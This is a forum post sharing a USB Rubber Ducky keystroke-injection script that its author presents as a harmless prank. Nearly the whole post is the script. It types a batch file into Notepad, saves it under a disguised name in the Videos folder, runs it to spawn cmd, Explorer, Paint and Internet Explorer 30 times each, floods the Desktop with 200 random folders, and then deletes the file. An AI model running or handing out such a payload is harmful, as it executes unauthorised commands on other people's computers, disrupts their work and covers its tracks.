Jump to content

Annoying Ducky Script


Recommended Posts

hello

i made this cool script that is just for fun

this is my first ducky script that i've been working on and i've been fixing it to make it run faster

what does it do?

it opens command prompt, file explorer, paint, and internet explorer 30 times.

this is quite a useless script, but i've had some fun with it.

please post with feedback and if so, tell me how i can improve this script.

i hope you like it :)

 

DELAY 750
CONTROL ESCAPE
DELAY 1000
STRING notepad
DELAY 1000
ENTER
DELAY 1000
STRING @echo off
ENTER
STRING for /l %%x in (1, 1, 30) do (start cmd.exe
ENTER
STRING start explorer.exe
ENTER
STRING start mspaint.exe
ENTER
STRING start iexplore.exe)
ENTER
STRING set loopcount=200
ENTER
STRING :loop
ENTER
STRING md "%userprofile%\Desktop\%random%"
ENTER
STRING set /a loopcount=loopcount-1
ENTER
STRING if %loopcount%==0 goto exitloop
ENTER
STRING goto loop
ENTER
STRING :exitloop
ENTER
STRING ( del /q /f "%~f0" >nul 2>&1 & ex it /b 0 )
CONTROL S
DELAY 1000
CONTROL A
DELAY 250
STRING %userprofile%\Videos\!rip$.bat
DELAY 250
TAB
RIGHTARROW
DOWNARROW
TAB
TAB
TAB
ENTER
DELAY 250
ALT F4
DELAY 250
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
ENTER
DELAY 1000
STRING start cmd /c "%userprofile%\Videos\!rip$.bat"
ENTER
ALT F4

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...